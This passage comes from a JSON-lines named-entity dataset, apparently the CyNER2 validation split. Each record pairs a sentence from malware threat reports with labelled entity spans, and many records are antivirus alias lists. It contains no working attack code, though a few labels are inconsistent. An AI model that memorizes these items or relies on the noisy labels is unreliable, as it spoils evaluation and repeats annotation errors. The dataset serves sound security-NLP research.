com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia .", "spans": {"Malware: RuMMS": [[6110, 6115]], "System: Android": [[6139, 6146]], "Malware: Android": [[6251, 6258]]}, "info": {"id": "cyner2_valid_000755", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.DropperFraudropK.Trojan Trojan.Orbus.C3 Win32.Trojan.WisdomEyes.16070401.9500.9996 Backdoor.Trojan BKDR_NANOCORE.SMD Win.Trojan.Nanocore-5 MSIL.Backdoor.Nancat.A Trojan.Win32.Dwn.edxxmu Backdoor.MSIL.Noancooe.JDE Trojan.Nanocore.23 BKDR_NANOCORE.SMD BehavesLike.Win32.PUPXBZ.dc Trojan.MSIL.NanoCore HackTool:MSIL/Noancooe.B Win-Trojan/Nanocore.Exp Backdoor.NanoCore Trojan.Msil MSIL/NanoCore.E Win32/Backdoor.dfa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000756", "source": "cyner2_valid"}}
{"text": "Dell SecureWorks Counter Threat UnitTM CTU researchers have analyzed multiple variants of this malware, which stealthily steals information from compromised systems.", "spans": {"Organization: Dell SecureWorks Counter Threat UnitTM CTU researchers": [[0, 54]], "Malware: malware,": [[95, 103]], "System: compromised systems.": [[145, 165]]}, "info": {"id": "cyner2_valid_000757", "source": "cyner2_valid"}}
{"text": "The social engineering message includes a link that leads to a fake version of a popular app , using names like Runtastic , WhatsApp or Netflix .", "spans": {"System: Runtastic": [[112, 121]], "System: WhatsApp": [[124, 132]], "System: Netflix": [[136, 143]]}, "info": {"id": "cyner2_valid_000758", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.CazakoDSC.Trojan Trojan.Injector Virus.W32.Virus!c Win32.Trojan.WisdomEyes.16070401.9500.9948 Trojan.Win32.IRCbot.basf Trojan.Win32.Inject.eusedv Trojan.Inject2.62537 BehavesLike.Win32.AdwareSearchProtect.mc Trojan.Win32.Injector W32/Trojan.UPSL-6537 TR/Injector.xryub Trojan.Win32.IRCbot.basf Backdoor:Win32/Kirts.A Trojan.IRCbot Trj/CI.A NSIS/Injector.WP Win32.Trojan.Ircbot.Htls Trojan.Injector!MdP75PI8ynA W32/Injector.DTAG!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000759", "source": "cyner2_valid"}}
{"text": "Why would a regular game downloaded from the official Google Play store come with another application named systemdata?", "spans": {"System: game": [[20, 24]], "System: Google Play store": [[54, 71]], "System: application": [[90, 101]]}, "info": {"id": "cyner2_valid_000760", "source": "cyner2_valid"}}
{"text": "For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination .", "spans": {"Malware: FrozenCell": [[32, 42]]}, "info": {"id": "cyner2_valid_000761", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.DownLoader13.29563 TrojanProxy:Win32/Wonknod.B Win32/Trojan.Downloader.ac3", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000762", "source": "cyner2_valid"}}
{"text": "Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel.", "spans": {"Malware: malware": [[48, 55]], "System: DNS queries": [[71, 82]]}, "info": {"id": "cyner2_valid_000763", "source": "cyner2_valid"}}
{"text": "One of these periods is currently ongoing.", "spans": {}, "info": {"id": "cyner2_valid_000764", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.8C57 Trojan/W32.TDSS.32768.GF Packed.Win32.TDSS!O Worm.Pondfull.B6 Worm.AutoRun.Win32.102264 Trojan/TDSS.c Trojan.Zusy.D1A4C7 Win32.Worm.Autorun.bm Trojan.Zeroaccess WORM_STASER.SM Worm.Win32.Pondfull.a Trojan.Win32.TDSS.bdcsyv Backdoor.Win32.Xtreme.32768 Trojan.Inject1.14023 WORM_STASER.SM BehavesLike.Win32.Packed.nh Packed.Tdss.bsct W32.Worm.SM Trojan[Packed]/Win32.Tdss Win32.Troj.TDSS.c.kcloud Worm:Win32/Pondfull.B Packer.W32.TDSS.tn6f Worm.Win32.Pondfull.a Trojan/Win32.Tdss.R69024 Worm.Pondfull Rootkit.TDSS Worm.AutoRun!kPqnRl2e8mk Packer.Win32.Tdss", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000765", "source": "cyner2_valid"}}
{"text": "Emerging from the bowels of Hacking Team data dump was a Flash 0-day exploit CVE-2015-5119 that was just patched today by Adobe as covered in APSB15-16.", "spans": {"Organization: Hacking Team": [[28, 40]], "Malware: Flash 0-day exploit": [[57, 76]], "Organization: Adobe": [[122, 127]], "Vulnerability: APSB15-16.": [[142, 152]]}, "info": {"id": "cyner2_valid_000766", "source": "cyner2_valid"}}
{"text": "This email was seen around 10/9/2014.", "spans": {}, "info": {"id": "cyner2_valid_000767", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojanpws.Msil Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Stealer.exqnls Trojan.Win32.Z.Rasftuby.1107617 Msil.Trojan-qqpass.Qqrob.Wlph Trojan.PWS.Stealer.1856 BehavesLike.Win32.Backdoor.tc W32/Trojan.PPNW-3117 TR/Rasftuby.cmyvl Trj/CI.A Win32/Trojan.e53", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000768", "source": "cyner2_valid"}}
{"text": "In our initial analysis and current activity tracking that began in November 2022, we observed Prometei deploying Windows-based tools and malware and other Linux versions observed by security researchers.", "spans": {"System: Windows-based": [[114, 127]], "Malware: tools": [[128, 133]], "Malware: malware": [[138, 145]], "System: Linux versions": [[156, 170]], "Organization: security researchers.": [[183, 204]]}, "info": {"id": "cyner2_valid_000769", "source": "cyner2_valid"}}
{"text": "Additionally, it also contains modules to target some popular social media apps.", "spans": {"System: social media apps.": [[62, 80]]}, "info": {"id": "cyner2_valid_000770", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.FamVT.QQPassACTTc.Worm Trojanpws.Makuha.18357 Trojan/QQPass.ova Win.Trojan.Pwstealer-225 Trojan-PSW.Win32.Makuha.bxs Trojan.Win32.Crypted.drvldd TrojWare.Win32.Rogue.SNST Trojan.PWS.Qqpass.11341 Trojan.QQPass.Win32.25524 Trojan/PSW.QQPass.qqe W32.Makuha Trojan[PSW]/Win32.Makuha Trojan-PSW.Win32.Makuha.bxs PWS:Win32/Makuha.A Trojan/Win32.Makuha.R152145 TrojanPSW.Makuha Trojan.PWS.Makuha! Trojan.Win32.PSW Trojan.PSW.Win32.GameOnline.GD", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000771", "source": "cyner2_valid"}}
{"text": "Once the victim enters their account information on the landing page , the phishing attack then requests that the user log in with their email address and phone number .", "spans": {}, "info": {"id": "cyner2_valid_000772", "source": "cyner2_valid"}}
{"text": "The link leads to a phishing page that asks for banking login credentials or an account number and PIN .", "spans": {}, "info": {"id": "cyner2_valid_000773", "source": "cyner2_valid"}}
{"text": "So we decided to write our own plugin code using IDA Python .", "spans": {"System: Python": [[53, 59]]}, "info": {"id": "cyner2_valid_000774", "source": "cyner2_valid"}}
{"text": "Both the tools and targets of Moonlight are reminiscent of Gaza Hacker Team, a group of attackers that are said to be politically aligned to the Hamas.", "spans": {"Malware: tools": [[9, 14]], "Organization: the Hamas.": [[141, 151]]}, "info": {"id": "cyner2_valid_000775", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9975 Trojan.Click3.25302 Trojan.Trojan.Liev.1 Trojan:Win32/Leivion.A Trojan/Win32.Skeeyah.C2313337 Trojan.Win32.Swrort", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000776", "source": "cyner2_valid"}}
{"text": "After achieving root access the app tries to replace the framework.jar file on the system partition .", "spans": {}, "info": {"id": "cyner2_valid_000777", "source": "cyner2_valid"}}
{"text": "TimerTask Figure 6 : The timer task .", "spans": {}, "info": {"id": "cyner2_valid_000778", "source": "cyner2_valid"}}
{"text": "These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android , or the patches were never installed by the user .", "spans": {"System: Android": [[128, 135]]}, "info": {"id": "cyner2_valid_000779", "source": "cyner2_valid"}}
{"text": "However , the actual timeline of the creation of different variants is unclear .", "spans": {}, "info": {"id": "cyner2_valid_000780", "source": "cyner2_valid"}}
{"text": "After the review , the process is the same as above .", "spans": {}, "info": {"id": "cyner2_valid_000782", "source": "cyner2_valid"}}
{"text": "Unlike previous campaigns from this actor, the flyer does not contain an Office exploit or a 0-day, it simply contains a malicious Visual Basic for Applications VBA macro.", "spans": {"Vulnerability: an Office exploit": [[70, 87]], "Vulnerability: a 0-day,": [[91, 99]], "Malware: malicious Visual Basic for Applications VBA macro.": [[121, 171]]}, "info": {"id": "cyner2_valid_000783", "source": "cyner2_valid"}}
{"text": "In recent months, a new trend seems to be emerging: targeted attacks where ransomware is deployed by threat actors after successfully gaining unauthorized access to an organization's network.", "spans": {"Organization: trend": [[24, 29]], "Malware: ransomware": [[75, 85]], "Organization: organization's network.": [[168, 191]]}, "info": {"id": "cyner2_valid_000784", "source": "cyner2_valid"}}
{"text": "] com ) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load .", "spans": {"System: iOS": [[53, 56]]}, "info": {"id": "cyner2_valid_000785", "source": "cyner2_valid"}}
{"text": ") are filled in and verified .", "spans": {}, "info": {"id": "cyner2_valid_000786", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.ADH Win32.HEURCrypted Trojan.DownLoader7.23367 W32/Trojan.DHSC-4693 Virus.Win32.Heur.d Trojan.ADH Trojan.Win32.Spy Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000787", "source": "cyner2_valid"}}
{"text": "It controls each and every functionality based on the commands sent by the command and control ( C & C ) server .", "spans": {}, "info": {"id": "cyner2_valid_000788", "source": "cyner2_valid"}}
{"text": "Mobile Threat Prevention identified the threat automatically by detecting exploitation attempts while examining the malware in the MTP emulators.", "spans": {"Organization: Mobile Threat Prevention": [[0, 24]], "Malware: threat": [[40, 46]], "Vulnerability: exploitation": [[74, 86]], "Malware: malware": [[116, 123]], "System: the MTP emulators.": [[127, 145]]}, "info": {"id": "cyner2_valid_000789", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TR/Spy.14336.115", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000790", "source": "cyner2_valid"}}
{"text": "Linkages between older RATs are explored later in this blog.", "spans": {"Malware: RATs": [[23, 27]]}, "info": {"id": "cyner2_valid_000791", "source": "cyner2_valid"}}
{"text": "Discovered for the first time in Mexico back in 2013, Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message, a technique that had never been seen before.", "spans": {"Malware: Ploutus": [[54, 61]], "Organization: ATMs": [[89, 93]], "System: machine": [[144, 151]]}, "info": {"id": "cyner2_valid_000792", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Win.Downloader.Small-2630 Virus.Win32.Patched.boked Trojan-Downloader.Win32.Tiny.br Exploit:Win32/Senglot.V", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000793", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Ransom.Peglegmorb.A13 W32/Trojan.QWSS-6329 Trojan.KillMBR.Win32.86 Trojan.Win32.KillMBR Trojan.DiskWriter.ab Trojan/Win32.DiskWriter Trojan:Win32/Peglegmorb.A Trojan/Win32.Peglegmorb.R185808 Trojan.DiskWriter Trj/CI.A Win32/KillMBR.NBQ W32/DiskKill.B!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000794", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: TROJ_TPROXY.SMIA Win32.Trojan.WisdomEyes.16070401.9500.9994 TROJ_TPROXY.SMIA Backdoor.Win32.TinyProxy.~HT Trojan.Click.21803 Backdoor.Win32.TinyProxy TR/TinyProxy.2 Trojan.Graftor.D2C80D TrojanProxy:Win32/Tinxy.C", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000795", "source": "cyner2_valid"}}
{"text": "In one sample , no SMS-related code appears in the DEX file , but there is a native method registered .", "spans": {}, "info": {"id": "cyner2_valid_000796", "source": "cyner2_valid"}}
{"text": "At this point the malware extracts and decrypts a stub DLL from its own resources ( ID 101 ) .", "spans": {}, "info": {"id": "cyner2_valid_000797", "source": "cyner2_valid"}}
{"text": "However , the underlying code can be quite different in that various obfuscation mechanisms were adopted to evade detection by anti-virus tools .", "spans": {}, "info": {"id": "cyner2_valid_000798", "source": "cyner2_valid"}}
{"text": "This mining Trojan horse mainly uses SSH weak password brute force cracking to attack the Linux platform.", "spans": {"Malware: Trojan horse": [[12, 24]], "System: the Linux platform.": [[86, 105]]}, "info": {"id": "cyner2_valid_000799", "source": "cyner2_valid"}}
{"text": "The adversaries behind these attacks continued to target Russia and other Russian speaking nations using similar exploits and attack vectors.", "spans": {"Organization: Russian speaking nations": [[74, 98]], "Vulnerability: exploits": [[113, 121]], "Vulnerability: attack vectors.": [[126, 141]]}, "info": {"id": "cyner2_valid_000800", "source": "cyner2_valid"}}
{"text": "This multi-stage attack piqued the interest of those working in the cloud security industry, as it involved a complex exploitation chain – including credential theft and lateral movement between AWS services.", "spans": {"Organization: the cloud security industry,": [[64, 92]], "Vulnerability: complex exploitation chain": [[110, 136]], "System: AWS services.": [[195, 208]]}, "info": {"id": "cyner2_valid_000801", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor.NJRat.FC.51 WORM_NJRAT.SMA1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Revetrat WORM_NJRAT.SMA1 Trojan.Win32.Dwn.efydxt Troj.Dropper.W32!c BackDoor.RevetRat.2 BehavesLike.Win32.Trojan.mm TR/Downloader.srns Backdoor:MSIL/NJRat.A!bit Trojan.Zusy.D31A73 Backdoor.NJRat Trj/GdSda.A Win32/Trojan.Dropper.66f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000802", "source": "cyner2_valid"}}
{"text": "These repackaged , malware-laden apps are neither on Google Play nor popular third-party app marketplaces , and we only saw the website hosting the malicious apps being promoted on social media when we followed GolfSpy ’ s trail .", "spans": {"System: Google Play": [[53, 64]], "Malware: GolfSpy": [[211, 218]]}, "info": {"id": "cyner2_valid_000803", "source": "cyner2_valid"}}
{"text": "The background service uses the reflection technique ( a feature that allows the inspection and modification of Java-based programs ’ internal properties ) to invoke the method com.Loader.start in the payload .", "spans": {}, "info": {"id": "cyner2_valid_000804", "source": "cyner2_valid"}}
{"text": "Hacking Team Spying Tool Listens to Calls By : Trend Micro July 21 , 2015 Following news that iOS devices are at risk of spyware related to the Hacking Team , the saga continues into the Android sphere .", "spans": {"Organization: Hacking Team": [[0, 12], [144, 156]], "Organization: Trend Micro": [[47, 58]], "System: iOS": [[94, 97]], "System: Android": [[187, 194]]}, "info": {"id": "cyner2_valid_000805", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Daws!O Dropper.Daws.Win32.7511 Trojan.Symmi.D32C8 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan-Dropper.Win32.Daws.axaz Trojan.Win32.Daws.csyqhx Trojan.Win32.A.Scar.53248.O BehavesLike.Win32.Virut.wt Trojan/Scar.asif Trojan/Win32.Scar Trojan:Win32/Yalogger.C Trojan-Dropper.Win32.Daws.axaz HEUR/Fakon.mwf TrojanDropper.Daws Trojan.Dropper Win32.Trojan-dropper.Daws.Dypc Trojan.Win32.Yalogger W32/ZLob.BBDE!tr.spy", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000806", "source": "cyner2_valid"}}
{"text": "Virus/Win32.Virut.ce Win32.Virut.cr.61440 Virus.Win32.Virut.ce TrojanDownloader:Win32/Gasonen.A HEUR/Fakon.mwf W32/Sality.AO Worm.Win32.AutoIt W32/Virut.CE", "spans": {}, "info": {"id": "cyner2_valid_000807", "source": "cyner2_valid"}}
{"text": "] com hxxp : //mailsa-wqe [ .", "spans": {}, "info": {"id": "cyner2_valid_000808", "source": "cyner2_valid"}}
{"text": "Citizen Labs first discovered the operation in late 2015 when a member of the Syrian opposition spotted a suspicious e-mail containing a PowerPoint slideshow.", "spans": {"Organization: Citizen Labs": [[0, 12]], "Organization: member": [[64, 70]], "Organization: the Syrian opposition": [[74, 95]]}, "info": {"id": "cyner2_valid_000810", "source": "cyner2_valid"}}
{"text": "As cybercriminals start to focus on pulling off attacks without leaving a trace, fileless malware, such as the recent SOREBRECT ransomware, will become a more common attack method.", "spans": {"Malware: fileless malware,": [[81, 98]], "Malware: SOREBRECT ransomware,": [[118, 139]]}, "info": {"id": "cyner2_valid_000811", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: HW32.Packed.F138 Backdoor.Bot.31879 W32.Virut.kYZj Backdoor.Bot.D7C87 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.IRCBot Backdoor.Bot.31879 Backdoor.Bot.31879 Backdoor.Bot.31879 Backdoor.Win32.Bot.318790 BehavesLike.Win32.RAHack.fc Backdoor:Win32/Poebot.AD Backdoor.Bot.31879", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000813", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Troj.Dropper.W32.Injector.m7mC Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.HVBE Win32/Tnega.AUXS Trojan-Downloader.MSIL.Injector.a Trojan.Win32.Inject.dpvshl W32/Backdoor.TCSC-2370 TrojanDownloader.MSIL.aef TR/AD.Rekrum.dmsmv Trojan-Downloader.MSIL.Injector.a TrojanDownloader:MSIL/Rekrum.A Trj/CI.A Msil.Trojan-downloader.Injector.Pcjc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000814", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Worm.Krol.A8 Backdoor.Klon.Win32.1007 Trojan/Canbis.c HT_KROL_GF150058.UVPM Win32.Virus.Probably.a Win32/Tnega.bBHGbLB TROJ_DELFLOADER_0000005.TOMA Win.Trojan.Smtp-1 Trojan.Win32.Delphi.bdxtvz Win32.HLLM.Belarus BehavesLike.Win32.HLLP.vm Trojan/Cosmu.t Trojan/Win32.Unknown Worm:Win32/Krol.A Trojan/Win32.Xema.C92285 Trojan.DL.Delphi!kp3dmHWwMdk P2P-Worm.Win32.Delf W32/DelpDldr.C W32/Knase.C", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000816", "source": "cyner2_valid"}}
{"text": "After Check Point notified Google about this threat , the apps were swiftly removed from the Play store .", "spans": {"Organization: Check Point": [[6, 17]], "Organization: Google": [[27, 33]], "System: Play store": [[93, 103]]}, "info": {"id": "cyner2_valid_000817", "source": "cyner2_valid"}}
{"text": "We discovered 561MB of exfiltrated data from 24 compromised Android devices while investigating this threat .", "spans": {"System: Android": [[60, 67]]}, "info": {"id": "cyner2_valid_000818", "source": "cyner2_valid"}}
{"text": "Distribution via waterhole attacks in Ukrainian news websites one case known", "spans": {"Organization: Ukrainian news websites": [[38, 61]]}, "info": {"id": "cyner2_valid_000819", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.TaraneD.Trojan Trojan-Downloader.Win32.VB!O TrojanDownloader.VB.PX3 Downloader.VB.Win32.27399 Trojan/Downloader.VB.aint Win32.Trojan.VB.aq TScope.Trojan.VB Win32/VB.BHW TROJ_STARTPAGE_00001dd.TOMA Trojan-Downloader.Win32.VB.ibwr Trojan.Win32.VB.dydtmu Trojan.Win32.A.Downloader.36881.A Troj.Downloader.W32.VB.lkln TrojWare.Win32.VB.aicx Trojan.DownLoad2.34275 Trojan.Win32.VB W32/Startpage.BKY TrojanDownloader.VB.dbkn TR/Dldr.VB.PX.17 Trojan[Downloader]/Win32.VB Trojan.Buzy.D785 Trojan-Downloader.Win32.VB.ibwr Downloader/Win32.VB.R22631 Trojan.Win32.VB.py Trojan.DL.VB!aE+g0wTEfFE Trojan.Downloader.Win32.VBCode.M", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000820", "source": "cyner2_valid"}}
{"text": "The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan.", "spans": {"Organization: French Ministry of Foreign Affairs": [[85, 119]]}, "info": {"id": "cyner2_valid_000821", "source": "cyner2_valid"}}
{"text": "Dropping Cluster Bombs RCSAndroid is a threat that works like a cluster bomb in that it deploys multiple dangerous exploits and uses various techniques to easily infect Android devices .", "spans": {"Malware: RCSAndroid": [[23, 33]], "System: Android": [[169, 176]]}, "info": {"id": "cyner2_valid_000822", "source": "cyner2_valid"}}
{"text": "The malware was able to perform overlay attacks and become the default SMS app through the abuse of the Accessibility Service .", "spans": {}, "info": {"id": "cyner2_valid_000824", "source": "cyner2_valid"}}
{"text": "Alberto Nisman, the Argentine prosecutor known for doggedly investigating a 1994 Buenos Aires bombing, was targeted by invasive spy software downloaded onto his cellular phone shortly before his mysterious death.", "spans": {"Organization: Alberto Nisman,": [[0, 15]], "Organization: Argentine prosecutor": [[20, 40]], "Malware: spy software": [[128, 140]], "System: cellular phone": [[161, 175]]}, "info": {"id": "cyner2_valid_000825", "source": "cyner2_valid"}}
{"text": "About eight weeks ago, a critical RCE vulnerability present in every Samba version since 2010 was reported and patched.", "spans": {"Vulnerability: critical RCE vulnerability": [[25, 51]], "System: Samba": [[69, 74]]}, "info": {"id": "cyner2_valid_000826", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32!O TrojanDropper.EESbinder Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.OUTE-0559 Win32/TrojanRunner.EES.10 Trojan-Dropper.Win32.EESbinder Trojan.Win32.Delf.dpvuse Dropper.EESbinder.20992 Troj.Dropper.W32.EESbinder.lrGz Win32.Trojan-dropper.Eesbinder.Pgcw Trojan.MulDrop.8071 Dropper.EESbinder.Win32.26 BehavesLike.Win32.Backdoor.cm Trojan-Downloader.Win32.Delf W32/Dropper.LHW TrojanDropper.EESbinder TR/EESBinder.3 Win32.Troj.EESbinder.kcloud Trojan-Dropper.Win32.EESbinder Dropper/EESBinder.20992 TrojanDropper.EESbinder Win32/TrojanDropper.EESbinder.10 Trojan.DR.EESbinder!Zc2Oat/eh7Y W32/EESbinder.A!tr.dr Win32/Trojan.38e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000827", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Hacktool.Seasharpee Trojan.PHP.Twoface.c ASP.S.WebShell.10418.A ASP.Shell.12 Troj.Php.Twoface!c Trojan.PHP.Twoface.c Backdoor:ASP/Seasharpee.A Backdoor.ASP.Seasharpee", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000828", "source": "cyner2_valid"}}
{"text": "As seen from the code in Figure 5 , the commands RuMMS supports right now include : install_true : to modify app preference to indicate that the C2 server received the victim device ’ s status .", "spans": {"Malware: RuMMS": [[49, 54]]}, "info": {"id": "cyner2_valid_000829", "source": "cyner2_valid"}}
{"text": "In practice, these capabilities are used to steal HTTP Cookies on popular social network sites and perform fraudulent actions such as non-legitimate follows views and likes on such sites.", "spans": {}, "info": {"id": "cyner2_valid_000830", "source": "cyner2_valid"}}
{"text": "Although it 's not pretty simple to hack Android devices and gadgets , sometimes you just get lucky to find a backdoor access .", "spans": {"System: Android": [[41, 48]]}, "info": {"id": "cyner2_valid_000831", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OlayFara.PE Trojan.Win32.Patch.1!O W32.Slugin.A Virus.Slugin.Win32.1 Win32.Virus.Slugin.a W32/Slugin.B W32.Slugin.A!inf Win32/Slugin.A PE_WPLUG.A Win.Spyware.59563-2 Virus.Win32.Slugin.a Virus.Win32.Slugin.ddowbn Troj.Spy.mt4a Worm.Win32.FakeFolder.e Trojan.MulDrop4.55815 PE_WPLUG.A W32/Slugin.B Win32/PatchFile.bi W32/Slugin.A Win32.Sality.ab.173464 Worm:Win32/Folstart.A Win32.Patched.N Virus.Win32.Slugin.a HEUR/Fakon.mwf Win32.Slugin.A W32/Wplug.A Worm.Win32.FakeFolder.CT", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000832", "source": "cyner2_valid"}}
{"text": "Adding connections to FakeSpy We have been seeing activity from XLoader since 2018 , and have since followed up our initial findings with a detailed research revealing a wealth of activity dating back to as early as January 2015 , which outlined a major discovery—its connection to FakeSpy .", "spans": {"Malware: FakeSpy": [[22, 29], [282, 289]], "Malware: XLoader": [[64, 71]]}, "info": {"id": "cyner2_valid_000833", "source": "cyner2_valid"}}
{"text": "The raw wave audio buffer frame can be dumped in the getNextBuffer ( ) function .", "spans": {}, "info": {"id": "cyner2_valid_000834", "source": "cyner2_valid"}}
{"text": "In 2015, KOVTER, a click-fraud malware, made headlines when it used a file-less technique similar to the POWERLIKS trojan.", "spans": {"Malware: KOVTER,": [[9, 16]], "Malware: click-fraud malware,": [[19, 39]], "Malware: the POWERLIKS trojan.": [[101, 122]]}, "info": {"id": "cyner2_valid_000835", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Crypmodadv Win32.Trojan.WisdomEyes.16070401.9500.9946 Ransom_Guperd.R002C0DB518 Trojan-Ransom.Win32.Crypmodadv.xpw Trojan.Win32.Encoder.extxks Trojan.Win32.Z.Ransom.1259520 Win32.Trojan.Crypmodadv.Ljan Trojan.Encoder.24362 Ransom_Guperd.R002C0DB518 TR/Guperd.ndytr Trojan-Ransom.Win32.Crypmodadv.xpw Trojan-Ransom.FileCoder W32/Filecoder_MoneroPay.A!tr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000836", "source": "cyner2_valid"}}
{"text": "This shift in targets is highly notable for the active cyber espionage operation we dubbed as Operation Iron Tiger. We believe that the threat actors have simply moved up in the food chain and were assigned new, high-level targets to spy on–all as part of a bigger espionage campaign.", "spans": {}, "info": {"id": "cyner2_valid_000837", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Backdoor/W32.Runagry.355840 Backdoor/Runagry.tu Trojan.Kazy.DD42 Win32.Trojan.WisdomEyes.16070401.9500.9942 Spyware.Keylogger Win.Trojan.Runagry-196 Win32.Trojan-Dropper.Seimon.B Trojan.Win32.Runagry.cobvv Backdoor.W32.Runagry.tu!c Win32.Backdoor.Runagry.Ljkf Trojan.Click1.58111 Backdoor.Runagry.Win32.332 BehavesLike.Win32.Downloader.fh Backdoor.Win32.Runagry Backdoor/Runagry.zn Trojan[Backdoor]/Win32.Runagry TrojanDownloader:Win32/Daumy.A Backdoor/Win32.Runagry.R67088 Backdoor.Runagry!Asgcy5bC1Zs W32/Runagry.TU!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000838", "source": "cyner2_valid"}}
{"text": "In early July, TALOS blogged about a new variant of the KONNI remote access trojan RAT, a malware family they discovered and wrote about in another blog post in early May.", "spans": {"Organization: TALOS": [[15, 20]], "Malware: the KONNI remote access trojan RAT,": [[52, 87]], "Malware: malware family": [[90, 104]]}, "info": {"id": "cyner2_valid_000839", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.SobigE.Worm Win32.Trojan.WisdomEyes.16070401.9500.9733 Win.Worm.Sobig-4 Worm.Win32.Z.Sobig.36628.G BehavesLike.Win32.Trojan.nh Worm.Win32.Sobig I-Worm/Sobig.e WORM/Sobig.E Worm[Email]/Win32.Sobig Worm:Win32/Sobig.E@mm.dam#2 Worm/Win32.Sobig.R95457 Win32/Worm.3de", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000840", "source": "cyner2_valid"}}
{"text": "The attackers are hosting the ServStart malware on a file server that is open for anyone to view.", "spans": {"Malware: the ServStart malware": [[26, 47]], "System: a file server": [[51, 64]]}, "info": {"id": "cyner2_valid_000841", "source": "cyner2_valid"}}
{"text": "Quick , easy access to sensitive data on mobile devices connected to enterprises and government agencies around the globe is extremely attractive to cybercriminals and hacktivists .", "spans": {}, "info": {"id": "cyner2_valid_000842", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.OnGameT2KSULAE.Trojan Trojan/W32.Cosmu.2219474 Exploit.Win32.EUDCPoC!O Trojan/Cosmu.aume Trojan.Win32.Cosmu.dtrtj Cosmu.AC Trojan.Win32.Cosmu.aulj Trojan.Meredrop!NInXzeWJQz8 TrojWare.Win32.Spy.Zbot.BPOE Trojan.DownLoader5.17612 BehavesLike.Win32.Trojan.vc TR/Meredrop.A.7775 Trojan/Win32.ADH Win32.Trojan.Cosmu.cclt W32/Cosmu.AULJ!tr Patched2_c.VFD Trojan.Win32.Cosmu.ajW Win32/Trojan.5aa", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000843", "source": "cyner2_valid"}}
